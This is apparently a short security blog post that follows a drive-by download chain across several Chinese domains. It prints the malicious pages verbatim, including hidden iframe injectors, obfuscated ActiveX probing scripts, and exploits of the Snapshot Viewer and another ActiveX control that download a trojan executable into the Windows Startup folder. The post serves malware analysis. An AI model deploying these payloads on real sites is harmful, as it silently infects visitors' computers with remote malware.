www.eoai114.cn and user1.jzm010.cn

malicious content here…

Content of index.html
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://user1.jzm010.cn/ilink.html width=100 height=0
></iframe>");
}
else{document.write("<Iframe src=http://user1.jzm010.cn/flink.html width=100 hei
ght=0></iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.dxp008.cn\/b2.htm width=50 height=0><
\/iframe>")

Content of aa2.htm?20
<Iframe src="http://user1.jzm010.cn/14.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/ac.htm" width=100 height=0></iframe>
<script>
var kaspersky="woyaofa"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTStri
ng"]()
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/newlz.htm"></iframe>
');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real11.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real10.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1"))window["document"]["wr
ite"]('<iframe style=display:none src="http://user1.jzm010.cn/lz.htm"></iframe>'
);}catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/
1812235.js"></script>

Let’s follow one of the link user1.jzm010.cn/ac.htm

<html><object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="obj"></object>
<script language="javascript">
var buf1 = "http://dddd.nihao69.cn/down/ko.exe";
var buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/qq.exe";
obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();
</script></html>
<Iframe src="http://user1.jzm010.cn/ce.htm" width=100 height=0></iframe>

what’s this? It’s exploiting MS Snapshot Viewer ActiveX control to download trojan.

Let’s follow another link user1.jzm010.cn/ce.htm
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2900.3354" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1="http://dddd.nihao69.cn/down/ko.exe";
install["DownloadAndInstall"](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

what’s is this clsid? could be another new exploit

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: